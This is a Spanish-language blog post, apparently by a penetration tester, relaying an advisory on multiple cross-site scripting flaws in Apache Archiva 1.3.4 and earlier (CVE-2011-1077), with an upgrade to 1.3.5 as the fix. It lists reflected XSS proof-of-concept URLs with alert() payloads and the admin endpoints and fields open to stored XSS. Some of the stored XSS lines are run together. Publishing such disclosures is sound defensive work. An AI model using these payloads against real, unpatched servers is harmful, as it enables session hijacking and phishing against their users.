Nueva Vulnerabilidad en Apache

Noticias, Updates, de Seguridad

#Apache #Archiva Multiple #XSS #vulnerabilities

Esto es con respecto a varios XSS (Cross Site Scripting) Vulnerabilidades en Archiva Apache 1.3.4 (y versiones anteriores).

Proyecto: Archiva Apache
Severidad: Alta
Versiones: 1.3.0 – 1.3.4. Las versiones no compatibles Archiva 1.0 – 1.2.2  también se ven afectados.
Tipo Exploit: Múltiples XSS
Mitigación: Archiva 1.3.4 y anteriores usuarios deben actualizar a 1.3.5
Dirección del vendedor: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077

Detalles de la vulnerabilidad:
El usuario puede insertar código HTML o ejecutar código JavaScript arbitrario en la aplicación vulnerable. Las vulnerabilidades se presentan debido a la insuficiencia de de validación de entradas en los campos de entrada múltiples a través de la aplicación. Una explotación exitosa de esta vulnerabilidad podría provocar, pero no limitado a, el compromiso de la solicitud, el robo basado en cookies credenciales de autenticación, la redirección de URL arbitrarios, divulgación o modificación de datos confidenciales y ataques de phishing.

Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript
%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifactId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

Persistant (Stored) XSS:
Exploit code: testhttp://127.0.0.1:8080/archiva/admin/addRepository.action
(Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action (Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId,Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action
http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action
(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

Esperando que esta inforamción sea de utilidad

Reciban un cordial Saludo.

Comparte este Post:

Tags: , ,

Professional Ethical Hacker, Pentester & Forensics Investigator MPCS, CEH v8, CSSP, CICP-CICAP HTCIA Member & ISECOM Member Twitter: @victormirandamx

Deja un comentario





February 2019
M T W T F S S
« Oct    
 123
45678910
11121314151617
18192021222324
25262728  
wordpress visitors